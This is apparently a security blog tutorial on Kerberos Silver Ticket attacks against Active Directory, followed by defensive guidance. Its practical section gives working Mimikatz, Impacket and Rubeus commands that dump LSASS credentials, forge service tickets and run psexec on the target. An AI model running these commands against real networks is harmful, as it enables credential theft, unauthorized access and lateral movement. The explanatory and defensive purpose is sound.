Introduction
A Silver Ticket attack is a stealthy Kerberos exploitation technique that allows attackers to access specific network services in an Active Directory environment by forging service tickets. Unlike Golden Tickets, which provide domain-wide access by compromising the KRBTGT account, Silver Tickets exploit individual service account credentials to impersonate authorized users for targeted resources. These attacks bypass the domain controller’s scrutiny entirely, as the forged service tickets are validated directly by the target service without any communication with the Key Distribution Center (KDC), making them exceptionally difficult to detect. The sophistication of Silver Ticket attacks lies in their stealth characteristics. Once an attacker obtains the NTLM hash of a service account—such as those running SQL Server, file shares (CIFS), or web applications—they can forge Ticket Granting Service (TGS) tickets offline and present them directly to the target service. This means the attack occurs below the radar of traditional domain controller monitoring, as there are no corresponding Ticket Granting Ticket (TGT) requests or authentication events logged on the domain controller. Organizations that rely primarily on domain controller event logs for security monitoring may completely miss these attacks.
Silver Ticket attacks are particularly dangerous in enterprise environments because they enable persistent access to critical services such as databases, file servers, and application platforms. Attackers can maintain this access for extended periods—until the compromised service account password is changed—allowing them to exfiltrate sensitive data, escalate privileges, or establish persistent footholds within the network. Research indicates that more than 60% of lateral movement campaigns leverage some form of Kerberos ticket exploitation, with Silver Tickets being a preferred method for skilled adversaries due to their stealthy nature. The challenge is compounded by the fact that traditional containment methods, such as resetting the KRBTGT password (which invalidates Golden Tickets), have no effect on Silver Tickets, potentially creating a false sense of security for incident responders.
Learning Objectives
- Understand the concept and mechanics of Silver Ticket attacks in Active Directory.
- Recognize the steps involved in conducting a Silver Ticket attack.
- Explore practical techniques and tools used by adversaries.
- Identify robust defense strategies and detection methods to protect your organization from this threat.
What is Silver Ticket Attack
A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket that grants access to a specific service within an Active Directory domain. By compromising the NTLM hash of a service account, attackers create a fake service ticket, which is trusted by the targeted service but never validated by the domain controller (KDC). This enables the attacker to impersonate users and gain unauthorized access to shared resources like databases, file servers, or application services with the privileges of the compromised service account. The fundamental difference between Silver Tickets and other Kerberos attacks lies in their scope and operation—while Golden Ticket attacks target the KRBTGT account to forge Ticket Granting Tickets (TGTs) that provide domain-wide access, Silver Tickets specifically target individual service accounts to forge service tickets for particular resources. The technical mechanism behind Silver Ticket attacks exploits how Kerberos service authentication works. In normal Kerberos authentication, when a user wants to access a service, they present their TGT to the KDC, which issues a TGS encrypted with the service account’s password hash. This TGS contains a Privilege Attribute Certificate (PAC) that includes the user’s identity, group memberships, and authorization data. When an attacker obtains the NTLM hash of a service account through techniques like credential dumping, Kerberoasting, or extracting it from the local SAM database, they can forge their own TGS tickets offline and craft a custom PAC with arbitrary permissions, often granting themselves elevated rights.
What makes Silver Tickets particularly insidious is their stealth profile. Unlike Golden Tickets, which require interaction with the KDC and generate logs on domain controllers, Silver Tickets bypass the KDC entirely—all authentication events occur only on the target service itself, making detection significantly more challenging. Services commonly targeted include CIFS for file shares, HTTP/HTTPS for web applications, MSSQL for databases, and HOST for remote management. The forged tickets can remain valid until the service account password is changed, which in many organizations may be months or even years, enabling sophisticated adversaries to maintain persistent, stealthy access to critical infrastructure.
How silver ticket attacks work
Silver Ticket attacks exploit weaknesses in how Kerberos service tickets are validated in Active Directory environments, leveraging the fact that most services do not confirm the authenticity of received tickets with a domain controller. This flaw enables attackers who have compromised a service account’s NTLM hash to forge legitimate-looking Ticket Granting Service (TGS) tickets offline. Since these tickets are accepted by the targeted service without contacting the Key Distribution Center (KDC), adversaries can quietly gain and maintain access to valuable resources. These steps, often executed using widely available tools, allow attackers to perform actions with the same privileges as the compromised service account—often for long periods without detection.
- Account Compromise: The attack typically begins when adversaries gain access to the NTLM hash of a service or computer account. Common techniques include credential dumping tools that extract hashes directly from memory (e.g., LSASS), or Kerberoasting attacks that brute-force weakly protected service account passwords by requesting their Kerberos Service Tickets from the KDC and cracking them offline. The choice of target often revolves around privileged or rarely-changed service accounts, making them ideal for persistent access.
- Information Gathering: After acquiring the service account hash, the attacker gathers crucial domain metadata necessary for ticket forging. This generally includes the domain SID (Security Identifier), the fully qualified domain name (FQDN), and the specific Service Principal Name (SPN) details that uniquely identify the target service within Active Directory. Tools like PowerView or built-in Windows queries make it easy for attackers to enumerate this information and plan their next moves.
- Ticket Forging: Equipped with the necessary data, the attacker then uses tools such as Mimikatz, Impacket, or Rubeus to craft a forged TGS ticket. This forged ticket contains a custom Privilege Attribute Certificate (PAC) that designates arbitrary user privileges and can mimic legitimate users or assign elevated group memberships. The ticket is cryptographically signed using the compromised service account’s NTLM hash, ensuring that the target service will accept it as authentic—even if the permissions are excessive or the ticket validity is abnormally long.
- Lateral Movement and Persistence: With the forged ticket in hand, the adversary presents it to the intended service—such as MSSQL databases, file servers using CIFS, or enterprise web applications. Unlike Golden Ticket attacks (which involve the KDC), this stage occurs entirely at the service level, so the domain controller is never consulted for ticket validation. This makes the attack remarkably stealthy and difficult to detect using traditional domain controller-centric monitoring techniques. Attackers utilize the permissions of the service account to execute commands, access sensitive information, or establish additional footholds for future operations.
- Privilege Escalation: Once inside the target service, an attacker can further exploit their access. Depending on the permissions assigned to the service account and the crafted PAC, adversaries may execute code, create new privileged accounts, exfiltrate critical data, or move laterally to other systems within the network. The persistence of a Silver Ticket attack often lasts until the service account password is rotated—a process that is frequently neglected for service and machine accounts in many organizations.
By taking advantage of underlying protocol weaknesses and incomplete validation on the service end, Silver Ticket attacks allow attackers to operate under the radar of many conventional detection mechanisms—posing a significant risk to organizations that rely on Active Directory.
Attack with Practical Implementation
Understanding Silver Ticket attacks requires familiarity with the tools and techniques adversaries use to forge service tickets. This section explores the practical implementation of Silver Ticket attacks using three primary tools: Mimikatz, Impacket, and Rubeus. Each tool offers unique capabilities and approaches to forging Kerberos service tickets, making them essential components in both offensive security assessments and defensive research.
Mimikatz: The Classic Approach
Mimikatz remains the most widely recognized tool for Kerberos ticket manipulation and Silver Ticket attacks. The workflow begins with compromising a service or computer account to extract its NTLM hash.
Step 1: Extract Service Account Credentials
First, enable debug privileges and dump the NTLM hash from LSASS memory on the target system:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
This command reveals the NTLM hash of the computer or service account (e.g., FileServer1$ or sqlsvc), which is essential for forging the ticket.
Step 2: Gather Required Information
Before forging the ticket, collect the following information:
- Domain SID: Obtain by running
whoami /userand removing the RID (last segment) from the output - Target FQDN: The fully qualified domain name of the target service
- Service Principal Name (SPN): The specific service type (e.g.,
CIFS,MSSQLSvc,HTTP) - Username: Can be any username, including fake accounts that don’t exist in AD (prior to November 2021 updates)
Step 3: Forge the Silver Ticket
Create the forged service ticket using the following Mimikatz command
mimikatz # kerberos::golden /user:administrator /id:500 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:server.lab.adsecurity.org /service:cifs /rc4:d7e2b80507ea074ad59f152a1ba20458 /ptt
Parameter breakdown:
/user:– Username to impersonate (can be fictitious)/id:– User ID (500 is the default Administrator RID)/domain:– Target domain FQDN/sid:– Domain SID/target:– Target server FQDN/service:– Service type (CIFS, MSSQLSvc, HTTP, HOST, etc.)/rc4:– NTLM hash of the service account/ptt– Pass-the-Ticket, automatically injecting the ticket into memory
Step 4: Access the Target Service
Once the ticket is injected, you can access the service directly:
dir \\server.lab.denizhalil.com\c$
The forged ticket grants access without any interaction with the domain controller.
Impacket: Cross-Platform Flexibility
Impacket’s ticketer.py script provides a Linux-based alternative for Silver Ticket attacks, offering cross-platform capabilities and scriptable automation.
Step 1: Obtain Domain SID
Use lookupsid.py or getPac.py to retrieve the domain SID:
impacket-getPac -targetUser administrator domain.local/user:passwordThis outputs the Domain SID, which is required for ticket forging.
Step 2: Generate the Silver Ticket
Forge the service ticket using the collected information
impacket-ticketer -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 -spn cifs/fileserver.test.local administrator
Alternative with AES key (more stealthy):
impacket-ticketer -aesKey <AES256_KEY> -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -spn host/target.test.local username
Using AES encryption instead of RC4 makes the attack more difficult to detect, as modern environments favor AES for Kerberos encryption.
Step 3: Export and Use the Ticket
Export the generated ticket to the environment and use it for authentication:
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@fileserver.denizhalil.local -k -no-pass
The -k flag instructs the tool to use Kerberos authentication, and -no-pass indicates that no password is needed since the ticket is already cached.
Rubeus: Advanced Windows-Based Manipulation
Rubeus is a powerful C# toolkit designed for advanced Kerberos ticket manipulation on Windows systems. It offers sophisticated features including Diamond Ticket attacks (a refinement of Silver Tickets) and flexible execution methods.
Step 1: Hash Generation
If you have plaintext credentials, generate the hash using Rubeus
Rubeus.exe hash /user:sqlsvc /domain:domain.local /password:Password123This outputs RC4, AES128, and AES256 hashes that can be used for ticket forging.
Step 2: Forge the Silver Ticket
Create a Silver Ticket using Rubeus’ golden ticket function (despite the name, it can forge both TGT and TGS):
Rubeus.exe golden /rc4:<NTLM_HASH> /user:administrator /id:500 /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.domain.local /service:cifs /pttStep 3: Advanced Diamond Ticket Technique
Rubeus now supports Diamond Ticket attacks for service tickets, which use legitimate TGTs to forge more convincing service tickets:
Rubeus.exe diamond /ticket:<BASE64_TGT> /servicekey:<AES256_SERVICE_KEY> /service:cifs/server.domain.local /enctype:aes256 /domain:domain.local /dc:dc.domain.local /ticketuser:targetuser /nowrap /pttDiamond Tickets are significantly stealthier than traditional Silver Tickets because they retain characteristics of legitimate tickets, making detection more difficult.
How to protect from Silver Ticket attacks
Defending against Silver Ticket attacks requires a comprehensive, multi-layered security strategy that addresses both prevention and detection. Since these attacks exploit service account credentials and bypass domain controller validation, organizations must focus on hardening service accounts, implementing robust monitoring systems, and maintaining strict access controls. The following measures represent industry best practices for mitigating Silver Ticket attack risks.
- 1. Service Account Hardening and Management Implement strong password policies with 15+ character complexity and enforce rotation every 90 days. Deploy Managed Service Accounts (MSAs) or Group Managed Service Accounts (gMSAs) for automatic password rotation. Apply the Principle of Least Privilege by regularly auditing and removing unnecessary permissions. Use Privileged Access Management (PAM) solutions for centralized credential storage, automated rotations, and detailed audit trails.
- 2. Kerberos Delegation Controls Eliminate unconstrained delegation completely from your environment. Transition to constrained delegation to limit service account permissions to specific services. Implement resource-based constrained delegation (RBCD) for more granular control. Audit delegation configurations regularly using tools like BloodHound or PowerView.
- 3. Advanced Monitoring and Detection Monitor Windows Event Logs for Event IDs 4624, 4627, 4769, and 4672 to detect anomalous authentication patterns. Deploy SIEM solutions to identify TGS usage without corresponding TGT requests to the KDC. Implement User and Entity Behavior Analytics (UEBA) to detect deviations from normal service account behavior. Configure real-time alerting for unusual access patterns, multiple continuous accesses, and data accumulation indicating exfiltration.
- 4. System Hardening and Patch Management Keep all systems updated with the latest security patches, prioritizing domain controllers. Harden domain controllers by restricting access, implementing BitLocker encryption, and deploying TPM chips. Implement credential protection with Credential Guard, LSA Protection, and LAPS to prevent unauthorized access and lateral movement.
- 5. Authentication and Access Controls Enforce Multi-Factor Authentication (MFA) for all privileged accounts and service account operations. Deploy application allow-listing to prevent unauthorized tools from executing. Use Secure Administrative Workstations (SAWs) or Privileged Access Workstations (PAWs) for all privileged operations. Enable Kerberos pre-authentication and PAC validation to strengthen authentication mechanisms.
- 6. Security Awareness and Incident Response Train security teams regularly on Silver Ticket detection and response procedures. Develop comprehensive incident response playbooks with specific steps for isolation, credential resets, and forensic investigation. Conduct regular penetration testing targeting service accounts and Kerberos authentication. Implement continuous improvement by analyzing detected attacks and refining security controls.
Conclusion
Silver Ticket attacks represent a significant and evolving threat to any Active Directory-based environment. By leveraging the NTLM hash of a service account, attackers can forge valid Kerberos service tickets, access sensitive enterprise resources, and evade many traditional detection mechanisms designed to monitor domain controller activity. The stealthy nature of these attacks—bypassing the Key Distribution Center entirely and generating minimal network traffic—makes them particularly attractive to sophisticated adversaries who prioritize persistence over immediate domain-wide access. As organizations increasingly rely on Active Directory for identity management, the attack surface continues to expand, and Silver Ticket attacks remain a preferred technique for lateral movement and privilege escalation in targeted intrusion campaigns. The persistence of Silver Ticket attacks in modern threat landscapes reflects broader trends in adversary tactics. Research indicates that Active Directory has remained a primary attack vector in nearly every major ransomware campaign, with attackers leveraging Kerberos exploitation techniques including Silver Tickets to maintain stealthy, long-term access to critical infrastructure. The Change Healthcare breach of 2024, orchestrated by the ALPHV ransomware group and documented as the most expensive breach to date, exemplified how Active Directory compromises enable catastrophic outcomes. Despite Microsoft’s ongoing efforts to reduce the Active Directory attack surface—including encrypting LDAP by default, adding encryption controls to SMBv3, and introducing features to deprecate NTLM—adversaries have adapted their techniques, increasingly using automation, AI-driven reconnaissance, and living-off-the-land tactics to avoid detection.
The best defense against Silver Ticket attacks combines multiple layers of protection: rigorous service account hygiene with automated password rotation, careful Kerberos delegation management that eliminates unconstrained delegation, extensive monitoring with advanced behavioral analytics, modern endpoint protections including Credential Guard and LSA Protection, and specialized security awareness training for IT and security teams. Organizations must also conduct regular Active Directory security assessments to identify misconfigurations, excessive privileges, and attack paths that adversaries could exploit. Tools like Microsoft Defender for Identity provide proactive security posture assessments that detect common misconfigurations in Active Directory and recommend remediation actions, helping organizations maintain visibility into their identity infrastructure. Understanding the technical mechanics, attack vectors, and defensive strategies for Silver Ticket attacks empowers organizations to build resilient defenses and reduce risk from sophisticated adversaries. As the threat landscape continues to evolve in 2025 and beyond, with attackers increasingly targeting the connections between on-premises Active Directory and cloud environments through hybrid attack vectors, maintaining a robust Active Directory security posture becomes not just a technical requirement but a critical business imperative. Organizations that invest in comprehensive Active Directory hardening, implement continuous monitoring and detection capabilities, and foster a security-aware culture will be best positioned to detect and respond to Silver Ticket attacks before they can cause significant damage to critical business operations and data assets.